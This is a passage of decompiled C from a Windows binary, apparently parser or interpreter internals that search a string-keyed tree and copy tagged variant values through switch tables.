																		__eflags = _t1256;
																		if(__eflags != 0) {
																			_push(_t1256);
																			E00AA10FC();
																			_t1826 = _t1826 + 4;
																		}
																		_push( ~(0 | __eflags > 0x00000000) |  *(_t1407 + 8) * 0x00000002);
																		_t1259 = E00AA14F7(_t1748, _t1786, __eflags);
																		_t1826 = _t1826 + 4;
																		 *_t1407 = _t1259;
																		 *((short*)(_t1259 + _t1786 * 2)) = 0;
																	}
																	E00AA0D80( *_t1407,  *_t1748,  *(_t1407 + 4) +  *(_t1407 + 4) + 2);
																	_t1826 = _t1826 + 0xc;
																}
															}
															_push(0x10);
															 *((intOrPtr*)(_t1407 + 0x10)) = _v160;
															_t1222 = E00AA14F7(_t1748, _t1786, __eflags);
															_t1508 = 0;
															_t1809 = _t1826 + 4;
															__eflags = _t1222;
															if(_t1222 == 0) {
																L109:
																_t1223 = _v208;
																_t1750 = 0;
																 *((intOrPtr*)(_t1407 + 0x14)) = _t1508;
																 *(_t1407 + 0x1c) = 0;
																 *(_t1407 + 0x18) = 0;
																_t1787 =  *_t1223;
																__eflags = _t1787;
																if(_t1787 == 0) {
																	 *(_t1407 + 0x1c) = 0;
																	 *(_t1407 + 0x18) = 0;
																	L139:
																	 *_t1223 = _t1407;
																	goto L140;
																}
																__eflags =  *0xb395e4 & 0x00000001;
																if(__eflags == 0) {
																	 *0xb395e4 =  *0xb395e4 | 0x00000001;
																	E00ADB393(0xb395c4);
																	E00AA122A(__eflags, 0xab5b32);
																	_t1809 = _t1809 + 4;
																}
																 *0xb395e0 = _t1750;
																 *0xb395dc = _t1750;
																_v112 = 0xb395c4;
																_v140 = 0xb395c4;
																while(1) {
																	_t1227 =  *(_t1407 + 4);
																	_t1665 =  *((intOrPtr*)(_t1787 + 4));
																	__eflags = _t1227 - _t1750;
																	if(_t1227 == _t1750) {
																		goto L431;
																	}
																	L113:
																	__eflags = _t1665 - _t1750;
																	if(_t1665 == _t1750) {
																		L432:
																		__eflags = _t1227 - _t1750;
																		if(_t1227 != _t1750) {
																			L124:
																			_t257 = _t1787 + 0x1c; // 0x1c
																			_t1241 = _t257;
																			_v204 = _t1241;
																			_t1242 =  *_t1241;
																			__eflags = _t1242 - _t1750;
																			if(_t1242 != _t1750) {
																				_v160 = _t1242;
																				_t1243 = E00AD30CF(_t1242, _t1407);
																				_t1809 = _t1809 + 8;
																				__eflags = _t1243;
																				if(_t1243 == 0) {
																					L446:
																					 *(_v140 + 0x1c) = _t1787;
																					_v140 = _t1787;
																					_t1787 =  *_v204;
																					while(1) {
																						_t1227 =  *(_t1407 + 4);
																						_t1665 =  *((intOrPtr*)(_t1787 + 4));
																						__eflags = _t1227 - _t1750;
																						if(_t1227 == _t1750) {
																							goto L431;
																						}
																						goto L113;
																					}
																				}
																				_t1245 = _v160;
																				 *_v204 =  *(_t1245 + 0x18);
																				 *(_t1245 + 0x18) = _t1787;
																				_t1787 = _t1245;
																				__eflags =  *(_t1245 + 0x1c) - _t1750;
																				if( *(_t1245 + 0x1c) == _t1750) {
																					goto L125;
																				}
																				_t1246 = _t1245 + 0x1c;
																				__eflags = _t1246;
																				_v204 = _t1246;
																				goto L446;
																			}
																			L125:
																			 *(_v140 + 0x1c) =  *(_t1787 + 0x18);
																			 *(_v112 + 0x18) =  *(_t1787 + 0x1c);
																			_t1231 =  *0xb395e0; // 0x0
																			_t1668 =  *((intOrPtr*)(_t1787 + 4));
																			 *(_t1787 + 0x18) = _t1231;
																			_t1510 =  *0xb395dc; // 0x3201bd0
																			 *(_t1787 + 0x1c) = _t1510;
																			_t1232 =  *(_t1407 + 4);
																			__eflags = _t1232 - _t1750;
																			if(_t1232 == _t1750) {
																				__eflags = _t1668 - _t1750;
																				if(_t1668 != _t1750) {
																					L454:
																					 *(_t1407 + 0x18) =  *(_t1787 + 0x18);
																					 *(_t1407 + 0x1c) = _t1787;
																					 *(_t1787 + 0x18) = _t1750;
																					L138:
																					_t1223 = _v208;
																					goto L139;
																				}
																				L448:
																				__eflags = _t1232 - _t1750;
																				if(_t1232 != _t1750) {
																					L137:
																					_t1511 =  *0xb395dc; // 0x3201bd0
																					 *(_t1407 + 0x1c) = _t1511;
																					 *(_t1407 + 0x18) = _t1787;
																					 *(_t1787 + 0x1c) = _t1750;
																					goto L138;
																				}
																				L127:
																				__eflags = _t1232 - _t1668;
																				if(_t1232 < _t1668) {
																					_t1235 = E00A9D470( *_t1407,  *_t1787, _t1668);
																					L135:
																					__eflags = _t1235 - _t1750;
																					if(__eflags < 0) {
																						goto L454;
																					}
																					if(__eflags <= 0) {
																						_t1407 = _t1787;
																						goto L138;
																					}
																					goto L137;
																				}
																				__eflags = _t1232 - _t1750;
																				if(_t1232 <= _t1750) {
																					L451:
																					_t1235 = 0;
																				} else {
																					_t1513 =  *_t1787;
																					_t1669 = _t1232;
																					_t1236 =  *_t1407;
																					while(1) {
																						__eflags =  *_t1236 -  *_t1513;
																						if(__eflags != 0) {
																							if(__eflags < 0) {
																								_t1235 = _t1236 | 0xffffffff;
																								_t1750 = 0;
																							} else {
																								_t1235 = 1;
																								_t1750 = 0;
																								__eflags = 0;
																							}
																							goto L135;
																						}
																						_t1236 = _t1236 + 2;
																						_t1513 = _t1513 + 2;
																						_t1669 = _t1669 - 1;
																						__eflags = _t1669;
																						if(_t1669 != 0) {
																							continue;
																						} else {
																							_t1750 = 0;
																							__eflags = 0;
																							goto L451;
																						}
																					}
																				}
																				goto L135;
																			}
																			__eflags = _t1668 - _t1750;
																			if(_t1668 == _t1750) {
																				goto L448;
																			}
																			goto L127;
																		}
																	}
																	__eflags = _t1227 - _t1665;
																	if(_t1227 < _t1665) {
																		_t1248 = E00A9D470( *_t1407,  *_t1787, _t1665);
																		L122:
																		__eflags = _t1248 - _t1750;
																		if(__eflags < 0) {
																			L438:
																			_t762 = _t1787 + 0x18; // 0x18
																			_t1228 = _t762;
																			_v204 = _t1228;
																			_t1229 =  *_t1228;
																			__eflags = _t1229 - _t1750;
																			if(_t1229 == _t1750) {
																				goto L125;
																			}
																			_v160 = _t1229;
																			_t1237 = E00AD30CF(_t1407, _t1229);
																			_t1809 = _t1809 + 8;
																			__eflags = _t1237;
																			if(_t1237 == 0) {
																				L442:
																				 *(_v112 + 0x18) = _t1787;
																				_v112 = _t1787;
																				_t1787 =  *_v204;
																				_t1227 =  *(_t1407 + 4);
																				_t1665 =  *((intOrPtr*)(_t1787 + 4));
																				__eflags = _t1227 - _t1750;
																				if(_t1227 == _t1750) {
																					goto L431;
																				}
																				goto L113;
																			}
																			_t1239 = _v160;
																			 *_v204 =  *(_t1239 + 0x1c);
																			 *(_t1239 + 0x1c) = _t1787;
																			_t1787 = _t1239;
																			__eflags =  *(_t1239 + 0x18) - _t1750;
																			if( *(_t1239 + 0x18) == _t1750) {
																				goto L125;
																			}
																			_t1240 = _t1239 + 0x18;
																			__eflags = _t1240;
																			_v204 = _t1240;
																			goto L442;
																		}
																		if(__eflags <= 0) {
																			goto L125;
																		}
																		goto L124;
																	}
																	__eflags = _t1227 - _t1750;
																	if(_t1227 <= _t1750) {
																		L435:
																		_t1248 = 0;
																	} else {
																		_t1519 =  *_t1787;
																		_t1672 = _t1227;
																		_t1249 =  *_t1407;
																		while(1) {
																			__eflags =  *_t1249 -  *_t1519;
																			if(__eflags != 0) {
																				if(__eflags < 0) {
																					_t1248 = _t1249 | 0xffffffff;
																					_t1750 = 0;
																				} else {
																					_t1248 = 1;
																					_t1750 = 0;
																					__eflags = 0;
																				}
																				goto L122;
																			}
																			_t1249 = _t1249 + 2;
																			_t1519 = _t1519 + 2;
																			_t1672 = _t1672 - 1;
																			__eflags = _t1672;
																			if(_t1672 != 0) {
																				continue;
																			} else {
																				_t1750 = 0;
																				__eflags = 0;
																				goto L435;
																			}
																		}
																	}
																	goto L122;
																	L431:
																	__eflags = _t1665 - _t1750;
																	if(_t1665 != _t1750) {
																		goto L438;
																	}
																	goto L432;
																}
															} else {
																_t1753 = _v204;
																_t1673 =  *((intOrPtr*)(_t1753 + 8));
																_t1788 = _t1222;
																_t232 = _t1673 - 1; // 0x46
																_t1250 = _t232;
																_v140 = _t1788;
																 *((intOrPtr*)(_t1788 + 8)) =  *((intOrPtr*)(_t1753 + 8));
																 *(_t1788 + 0xc) = 0;
																__eflags = _t1250 - 0xb;
																if(__eflags > 0) {
																	L108:
																	_t1508 = _v140;
																	goto L109;
																}
																switch( *((intOrPtr*)(_t1250 * 4 +  &M00A9A994))) {
																	case 0:
																		__eax =  *__edi;
																		goto L266;
																	case 1:
																		__eax =  *__edi;
																		 *__esi = __eax;
																		__ecx =  *(__edi + 4);
																		 *(__esi + 4) = __ecx;
																		goto L108;
																	case 2:
																		__fp0 =  *__edi;
																		 *__esi = __fp0;
																		goto L108;
																	case 3:
																		_push(0x10);
																		_t1251 = E00AA14F7(_t1753, _t1788, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1251;
																		if(_t1251 == 0) {
																			_t1251 = 0;
																		} else {
																			_t1520 =  *(_t1753 + 0xc);
																			 *_t1251 =  *_t1520;
																			 *((intOrPtr*)(_t1251 + 4)) =  *((intOrPtr*)(_t1520 + 4));
																			 *((intOrPtr*)(_t1251 + 8)) =  *((intOrPtr*)(_t1520 + 8));
																			_t1521 =  *(_t1520 + 0xc);
																			 *(_t1251 + 0xc) = _t1521;
																			 *_t1521 =  *_t1521 + 1;
																			__eflags =  *_t1521;
																		}
																		 *(_t1788 + 0xc) = _t1251;
																		goto L108;
																	case 4:
																		_push(0x214);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			__eax = 0;
																			__eflags = 0;
																		} else {
																			__edx = _v204;
																			__esi =  *__edx;
																			__ecx = 0x85;
																			__edi = __eax;
																			__eax = memcpy(__eax, __esi, 0x85 << 2);
																			__edi = __esi + __ecx;
																			__edi = __esi + __ecx + __ecx;
																			__ecx = 0;
																		}
																		__ecx = _v140;
																		 *__ecx = __eax;
																		__eflags =  *(__eax + 4);
																		if( *(__eax + 4) != 0) {
																			__eax =  *(__eax + 4);
																			 *__eax =  *__eax + 1;
																		}
																		goto L108;
																	case 5:
																		__edx =  *__edi;
																		 *__esi = __edx;
																		goto L108;
																	case 6:
																		__eflags =  *__edi;
																		if(__eflags != 0) {
																			_push(0x10);
																			__eax = E00AA14F7(__edi, __esi, __eflags);
																			__esp = __esp + 4;
																			_push(__eax);
																			 *__esi = __eax;
																			__imp__#8();
																			__edx =  *__edi;
																			__eax =  *__esi;
																			_push(__edx);
																			_push(__eax);
																			__imp__#10();
																			__eflags = __eax;
																			if(__eax < 0) {
																				__ecx =  *__esi;
																				_push( *__esi);
																				__imp__#9();
																				__edx =  *__esi;
																				_push(__edx);
																				__eax = E00AA10FC();
																				__esp = __esp + 4;
																				 *__esi = 0;
																			}
																		}
																		goto L108;
																	case 7:
																		 *__esi =  *__edi;
																		goto L108;
																	case 8:
																		_push(0x18);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L429;
																		}
																		__ecx =  *__edi;
																		__eax = E00ADB82F(__eax,  *__edi);
																		goto L266;
																	case 9:
																		_push(8);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		 *__esi = __eax;
																		__edx =  *__edi;
																		__ecx =  *( *__edi);
																		 *__eax =  *( *__edi);
																		__edx =  *__esi;
																		__eax =  *( *__esi);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eflags == 0) {
																			_push(1);
																			__eax = E00AA14F7(__edi, __esi, __eflags);
																			__ecx =  *__esi;
																			 *(__ecx + 4) = __eax;
																			__edx =  *__esi;
																			__eax =  *(__edx + 4);
																			__esp = __esp + 4;
																			 *__eax = 0;
																		} else {
																			_push(__eax);
																			__eax = E00AA14F7(__edi, __esi, __eflags);
																			__ecx =  *__esi;
																			 *( *__esi + 4) = __eax;
																			__esi =  *__esi;
																			__edx =  *__esi;
																			__eax =  *__edi;
																			__ecx =  *( *__edi + 4);
																			__esp = __esp + 4;
																			__edx =  *(__esi + 4);
																			__eax = E00AA0D80( *(__esi + 4),  *( *__edi + 4),  *__esi);
																		}
																		goto L108;
																	case 0xa:
																		_push(0x14);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			L429:
																			__eax = 0;
																			L266:
																			 *__esi = __eax;
																			goto L108;
																		}
																		__ecx =  *__edi;
																		__eax = E00B0082A(__eax,  *__edi);
																		goto L266;
																}
															}
														} else {
															__eflags =  *0xb395e4 & 0x00000001;
															_v161 = 0;
															if(__eflags == 0) {
																 *0xb395e4 =  *0xb395e4 | 0x00000001;
																E00ADB393(0xb395c4);
																E00AA122A(__eflags, 0xab5b32);
																_t1809 = _t1809 + 4;
																_t1219 = 0;
															}
															 *0xb395e0 = _t1219;
															 *0xb395dc = _t1219;
															_t1269 = 0xb395c4;
															_v112 = 0xb395c4;
															while(1) {
																_v140 = _t1269;
																while(1) {
																	L80:
																	_t1270 = _t1748[1];
																	_t1534 =  *_t1406;
																	_t1684 =  *(_t1534 + 4);
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		goto L386;
																	}
																	L81:
																	__eflags = _t1684;
																	if(_t1684 == 0) {
																		L387:
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			L92:
																			_t1283 =  *( *_t1406 + 0x1c);
																			__eflags = _t1283;
																			if(_t1283 != 0) {
																				_t1284 = E00AD30CF(_t1283, _t1748);
																				_t1809 = _t1809 + 8;
																				__eflags = _t1284;
																				if(_t1284 == 0) {
																					L399:
																					 *((intOrPtr*)(_v112 + 0x1c)) =  *_t1406;
																					_t1286 =  *_t1406;
																					_v112 = _t1286;
																					 *_t1406 =  *(_t1286 + 0x1c);
																					L80:
																					_t1270 = _t1748[1];
																					_t1534 =  *_t1406;
																					_t1684 =  *(_t1534 + 4);
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L386;
																					}
																					goto L81;
																				}
																				_t1288 =  *( *_t1406 + 0x1c);
																				 *( *_t1406 + 0x1c) =  *(_t1288 + 0x18);
																				 *(_t1288 + 0x18) =  *_t1406;
																				 *_t1406 = _t1288;
																				__eflags =  *(_t1288 + 0x1c);
																				if( *(_t1288 + 0x1c) == 0) {
																					goto L93;
																				}
																				goto L399;
																			}
																			L93:
																			__eflags = _v161;
																			 *(_v112 + 0x1c) =  *( *_t1406 + 0x18);
																			 *(_v140 + 0x18) =  *( *_t1406 + 0x1c);
																			_t1537 =  *0xb395e0; // 0x0
																			 *( *_t1406 + 0x18) = _t1537;
																			_t1276 =  *0xb395dc; // 0x3201bd0
																			 *( *_t1406 + 0x1c) = _t1276;
																			if(__eflags != 0) {
																				_t1408 =  *_t1406;
																				__eflags =  *_t1406;
																				if(__eflags == 0) {
																					goto L94;
																				}
																				E00A990D0( *((intOrPtr*)(_t1408 + 0x14)), _v204, _v204);
																				goto L140;
																			}
																			goto L94;
																		}
																	}
																	__eflags = _t1270 - _t1684;
																	if(_t1270 < _t1684) {
																		_t1290 = E00A9D470( *_t1748,  *_t1534, _t1684);
																		L90:
																		__eflags = _t1290;
																		if(__eflags < 0) {
																			L393:
																			_t1272 =  *( *_t1406 + 0x18);
																			__eflags = _t1272;
																			if(_t1272 == 0) {
																				goto L93;
																			}
																			_t1278 = E00AD30CF(_t1748, _t1272);
																			_t1809 = _t1809 + 8;
																			__eflags = _t1278;
																			if(_t1278 == 0) {
																				L396:
																				 *(_v140 + 0x18) =  *_t1406;
																				_t1269 =  *_t1406;
																				 *_t1406 =  *(_t1269 + 0x18);
																				_v140 = _t1269;
																				continue;
																			}
																			_t1281 =  *( *_t1406 + 0x18);
																			 *( *_t1406 + 0x18) =  *(_t1281 + 0x1c);
																			 *(_t1281 + 0x1c) =  *_t1406;
																			 *_t1406 = _t1281;
																			__eflags =  *(_t1281 + 0x18);
																			if( *(_t1281 + 0x18) == 0) {
																				goto L93;
																			}
																			goto L396;
																		}
																		if(__eflags <= 0) {
																			_v161 = 1;
																			goto L93;
																		}
																		goto L92;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		L390:
																		_t1290 = 0;
																	} else {
																		_t1545 =  *_t1534;
																		_t1693 = _t1270;
																		_t1291 =  *_t1748;
																		while(1) {
																			__eflags =  *_t1291 -  *_t1545;
																			if(__eflags != 0) {
																				break;
																			}
																			_t1291 = _t1291 + 2;
																			_t1545 = _t1545 + 2;
																			_t1693 = _t1693 - 1;
																			__eflags = _t1693;
																			if(_t1693 != 0) {
																				continue;
																			} else {
																				_t1406 = _v208;
																				goto L390;
																			}
																		}
																		_t1406 = _v208;
																		if(__eflags < 0) {
																			_t1290 = _t1291 | 0xffffffff;
																		} else {
																			_t1290 = 1;
																		}
																	}
																	goto L90;
																	L386:
																	__eflags = _t1684;
																	if(_t1684 != 0) {
																		goto L393;
																	}
																	goto L387;
																}
															}
														}
														L371:
														_t1740 =  *( *_t1652);
														__eflags = _t1740 - 0x24;
														if(_t1740 == 0x24) {
															L374:
															_t1778 = _t1778 + 1;
															_t1652 = _t1652 + 4;
															__eflags = _t1652;
															goto L375;
														}
														__eflags = _t1740 - 0x1e;
														if(_t1740 != 0x1e) {
															goto L375;
														}
														_v208 = 0x100;
														_t1177 = _v208;
														goto L374;
													}
												} else {
													_v212 = 3;
													_v108 = _t1444;
													while(1) {
														__eflags = _t1611 - _v208;
														if(_t1611 >= _v208) {
															goto L57;
														}
														_v116 = _v116 + 1;
														_t1308 =  *(_v148 + 4) + _v212 * 4;
														_t1559 =  *_t1308;
														_t1728 = 0;
														_t1411 = 0;
														__eflags =  *(_t1559 + 8);
														if( *(_t1559 + 8) == 0) {
															do {
																_t1561 =  *((intOrPtr*)( *_t1308));
																__eflags = _t1561 - 0x24;
																if(_t1561 != 0x24) {
																	__eflags = _t1561 - 0x1e;
																	if(_t1561 != 0x1e) {
																		_push(0xffffffff);
																		_push(0x91);
																		L623:
																		_push(_a4);
																		goto L624;
																	}
																	_t1728 = 0x100;
																	goto L301;
																}
																_t1411 = 1;
																L301:
																_t1562 =  *((intOrPtr*)(_t1308 + 4));
																_v212 = _v212 + 1;
																_t1308 = _t1308 + 4;
																__eflags =  *((short*)(_t1562 + 8));
															} while ( *((short*)(_t1562 + 8)) == 0);
														}
														_t1697 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1611 * 4));
														__eflags =  *((short*)(_t1697 + 8)) - 0x33;
														if( *((short*)(_t1697 + 8)) != 0x33) {
															_t1411 = 0;
															__eflags = 0;
														}
														_t1791 = _v124;
														_t1310 = _v120;
														__eflags = _t1791 - _t1310;
														if(__eflags == 0) {
															_t1311 = _t1310 + _t1310;
															__eflags = _t1311 - 4;
															if(__eflags < 0) {
																_t1311 = 4;
															}
															_v120 = _t1311;
															_push( ~(0 | __eflags > 0x00000000) | _t1311 * 0x00000004);
															_v156 = E00AA14F7(_t1728, _t1791, __eflags);
															E00AA0D80(_t1313, _v128, _t1791 * 4);
															_push(_v128);
															E00AA10FC();
															_t1809 = _t1809 + 0x14;
															_v128 = _v156;
														}
														_push(1);
														_t1317 = E00AA14F7(_t1728, _t1791, __eflags);
														_t1809 = _t1809 + 4;
														__eflags = _t1317;
														if(_t1317 == 0) {
															_t1317 = 0;
														} else {
															 *_t1317 = _t1411;
														}
														 *(_v128 + _t1791 * 4) = _t1317;
														_t1792 = _t1791 + 1;
														_v124 = _t1791 + 1;
														__eflags = _t1411;
														if(_t1411 != 0) {
															_t1570 = _v144;
															_t1319 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4));
															__eflags =  *((short*)(_t1319 + 8)) - 0x33;
															if( *((short*)(_t1319 + 8)) != 0x33) {
																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4)) + 0xa)));
																_push(0x91);
																_push(_a4);
																goto L624;
															}
															_t1573 = 0;
															_t1322 = E00A9C510(0,  *_t1319,  &_v200,  &_v204);
															__eflags = _t1322;
															if(_t1322 == 0) {
																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
																_push(0x79);
																_push(_a4);
																goto L624;
															}
															__eflags = _v204 & 0x00000100;
															if((_v204 & 0x00000100) == 0) {
																L309:
																_t1325 = _v200;
																_t1728 = 1;
																_v144 = _v144 + 1;
																_v212 = _v212 + 1;
																__eflags =  *((intOrPtr*)(_t1325 + 8)) - 5;
																if( *((intOrPtr*)(_t1325 + 8)) != 5) {
																	L313:
																	E00A99190(_t1728,  &_v196);
																	_v188 = 6;
																	_v196 = _v200;
																	E00A9BC60(_t1411, _t1573, _t1728,  &_v180,  &_v196);
																	_t1412 = _v212;
																	goto L51;
																}
																_t1573 = _a8;
																_t1710 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4));
																__eflags =  *((short*)(_t1710 + 8)) - 0x4e;
																if( *((short*)(_t1710 + 8)) != 0x4e) {
																	goto L313;
																}
																_t1341 = E00A9C730( &_v144, _t1573, _t1851, _a4,  &_v200, 0);
																__eflags = _t1341;
																if(_t1341 == 0) {
																	goto L313;
																}
																E00A99190(1,  &_v196);
																E00AC0C87( &_v132);
																E00AA0B80( &_v180, 1);
																_t946 = 1;
																goto L264;
															}
															__eflags = _t1728 & 0x00000100;
															if((_t1728 & 0x00000100) != 0) {
																goto L309;
															}
															_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
															_push(0xb0);
															_push(_a4);
															goto L624;
														} else {
															_t1347 = _v184;
															__eflags = _t1347;
															if(_t1347 != 0) {
																E00AD651E(_t1347);
																_v188 = 0;
															}
															_t1349 = _v188;
															__eflags = _t1349 - 8;
															if(_t1349 == 8) {
																_t1350 = _v196;
																__eflags = _t1350;
																if(_t1350 != 0) {
																	__imp__#9(_t1350);
																	_push(_v200);
																	E00AA10FC();
																	_t1809 = _t1809 + 4;
																}
															} else {
																__eflags = _t1349 - 0xa;
																if(_t1349 == 0xa) {
																	_t1369 = _v196;
																	__eflags = _t1369;
																	if(_t1369 != 0) {
																		E00AD30B0(_t1369);
																	}
																} else {
																	__eflags = _t1349 - 5;
																	if(_t1349 == 5) {
																		E00A9E470( &_v196, _t1792);
																	} else {
																		__eflags = _t1349 - 0xb;
																		if(_t1349 == 0xb) {
																			_push( *(_v196 + 4));
																			E00AA10FC();
																			_push(_v196);
																			E00AA10FC();
																			_t1809 = _t1809 + 8;
																		} else {
																			__eflags = _t1349 - 0xc;
																			if(_t1349 == 0xc) {
																				_t1376 = _v196;
																				__eflags = _t1376;
																				if(_t1376 != 0) {
																					E00ADB350(_t1376);
																				}
																			}
																		}
																	}
																}
															}
															_t1799 = _v172;
															_t1351 = _v168;
															_v188 = 1;
															_v196 = 0;
															__eflags = _t1799 - _t1351;
															if(__eflags == 0) {
																_t1352 = _t1351 + _t1351;
																__eflags = _t1352 - 4;
																if(__eflags < 0) {
																	_t1352 = 4;
																}
																_v168 = _t1352;
																_push( ~(0 | __eflags > 0x00000000) | _t1352 * 0x00000004);
																_t1354 = E00AA14F7(_t1728, _t1799, __eflags);
																_t1413 = _v176;
																_t1755 = _t1354;
																E00AA0D80(_t1755, _t1413, _t1799 * 4);
																_push(_t1413);
																E00AA10FC();
																_t1809 = _t1809 + 0x14;
																_v176 = _t1755;
															}
															_t1728 = _v176;
															_push(0x10);
															_t1358 = E00AA14F7(_t1728, _t1799, __eflags);
															_t1809 = _t1809 + 4;
															__eflags = _t1358;
															if(_t1358 == 0) {
																_t1359 = 0;
																L49:
																_t1412 = _v208;
																 *(_t1728 + _t1799 * 4) = _t1359;
																_v172 = _t1799 + 1;
																_t1361 = E00A9A9D0(_a4, _t1851, _a8,  &_v144,  *((intOrPtr*)(_t1728 + (_t1799 + 1) * 4 - 4)), _t1412);
																__eflags = _t1361;
																if(_t1361 != 0) {
																	L625:
																	E00A99190(_t1728,  &_v196);
																	E00AC0C87( &_v132);
																	E00AA0B80( &_v180, _t1728);
																	_t946 = 1;
																	goto L264;
																} else {
																	_t1362 = _v212;
																	_t1717 =  *((intOrPtr*)( *(_v148 + 4) + 4 + _t1362 * 4));
																	__eflags =  *((short*)(_t1717 + 8)) - 0x41;
																	_v212 = _t1362 + 1;
																	if( *((short*)(_t1717 + 8)) == 0x41) {
																		_v212 = _v212 + 2;
																	}
																	L51:
																	_t1611 = _v144;
																	__eflags = _t1611 - _t1412;
																	if(_t1611 == _t1412) {
																		goto L57;
																	}
																	_t1796 = _a8;
																	_t1330 =  *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4));
																	__eflags =  *((intOrPtr*)(_t1330 + 8)) - 0x40;
																	if( *((intOrPtr*)(_t1330 + 8)) != 0x40) {
																		L354:
																		_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4)) + 0xa)));
																		_push(0x6f);
																		goto L623;
																	}
																	_t1332 = _t1611 + 1;
																	__eflags = _t1332 - _v208;
																	if(_t1332 == _v208) {
																		goto L354;
																	} else {
																		_t1611 = _t1332;
																		_v144 = _t1611;
																		_t1335 =  *((intOrPtr*)( *(_v148 + 4) + _v212 * 4));
																		__eflags =  *((intOrPtr*)(_t1335 + 8)) - 0x40;
																		if( *((intOrPtr*)(_t1335 + 8)) == 0x40) {
																			_t139 =  &_v212;
																			 *_t139 = _v212 + 1;
																			__eflags =  *_t139;
																		}
																		_t1337 = _v108 + 1;
																		_v108 = _t1337;
																		__eflags = _t1337 - _v136;
																		if(_t1337 < _v136) {
																			continue;
																		}
																		goto L57;
																	}
																}
															}
															_t1414 = _t1358;
															_t1364 = _v188;
															 *(_t1414 + 8) = _t1364;
															 *(_t1414 + 0xc) = 0;
															__eflags = _t1364 - 1;
															if(_t1364 != 1) {
																_t1365 = _t1364 - 1;
																__eflags = _t1365 - 0xb;
																if(__eflags > 0) {
																	L336:
																	_t1728 = _v176;
																	_t1799 = _v172;
																	L48:
																	_t1359 = _t1414;
																	goto L49;
																}
																switch( *((intOrPtr*)(_t1365 * 4 +  &M00ABAE32))) {
																	case 0:
																		goto L47;
																	case 1:
																		__eax = _v196;
																		 *__ebx = _v196;
																		__ecx = _v192;
																		__ebx[1] = __ecx;
																		goto L48;
																	case 2:
																		__fp0 = _v196;
																		 *__ebx = __fp0;
																		goto L48;
																	case 3:
																		_push(0x10);
																		_t1366 = E00AA14F7(_t1728, _t1799, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1366;
																		if(_t1366 == 0) {
																			 *(_t1414 + 0xc) = 0;
																		} else {
																			_t1589 = _v184;
																			 *_t1366 =  *_t1589;
																			 *((intOrPtr*)(_t1366 + 4)) =  *((intOrPtr*)(_t1589 + 4));
																			 *((intOrPtr*)(_t1366 + 8)) =  *((intOrPtr*)(_t1589 + 8));
																			_t1590 =  *((intOrPtr*)(_t1589 + 0xc));
																			 *((intOrPtr*)(_t1366 + 0xc)) = _t1590;
																			 *_t1590 =  *_t1590 + 1;
																			 *(_t1414 + 0xc) = _t1366;
																		}
																		goto L48;
																	case 4:
																		_push(0x214);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			__eax = 0;
																			__eflags = 0;
																		} else {
																			__esi = _v196;
																			__ecx = 0x85;
																			__edi = __eax;
																			__eax = memcpy(__eax, __esi, 0x85 << 2);
																			__edi = __esi + __ecx;
																			__edi = __esi + __ecx + __ecx;
																			__ecx = 0;
																		}
																		 *__ebx = __eax;
																		__eflags =  *(__eax + 4);
																		if( *(__eax + 4) != 0) {
																			__eax =  *(__eax + 4);
																			 *__eax =  *__eax + 1;
																			__eflags =  *__eax;
																		}
																		goto L336;
																	case 5:
																		__eax = _v196;
																		 *__ebx = _v196;
																		goto L48;
																	case 6:
																		__eflags = _v196;
																		if(__eflags == 0) {
																			goto L336;
																		}
																		_push(0x10);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		_push(__eax);
																		 *__ebx = __eax;
																		__imp__#8();
																		__ecx = _v200;
																		__edx =  *__ebx;
																		_push(__ecx);
																		_push( *__ebx);
																		__imp__#10();
																		__eflags = __eax;
																		if(__eax < 0) {
																			__eax =  *__ebx;
																			_push( *__ebx);
																			__imp__#9();
																			__ecx =  *__ebx;
																			_push( *__ebx);
																			__eax = E00AA10FC();
																			__esp = __esp + 4;
																			 *__ebx = 0;
																		}
																		goto L48;
																	case 7:
																		 *__ebx = _v196;
																		goto L48;
																	case 8:
																		_push(0x18);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L343;
																		}
																		__ecx = _v196;
																		 *__ebx = __eax;
																		goto L48;
																	case 9:
																		_push(8);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		 *__ebx = __eax;
																		__edx = _v196;
																		__ecx =  *_v196;
																		 *__eax =  *_v196;
																		__edx =  *__ebx;
																		__eax =  *( *__ebx);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eflags == 0) {
																			_push(1);
																			__eax = E00AA14F7(__edi, __esi, __eflags);
																			__ecx =  *__ebx;
																			 *(__ecx + 4) = __eax;
																			__edx =  *__ebx;
																			__eax =  *(__edx + 4);
																			__esp = __esp + 4;
																			 *( *(__edx + 4)) = 0;
																		} else {
																			_push(__eax);
																			__eax = E00AA14F7(__edi, __esi, __eflags);
																			__ecx =  *__ebx;
																			 *( *__ebx + 4) = __eax;
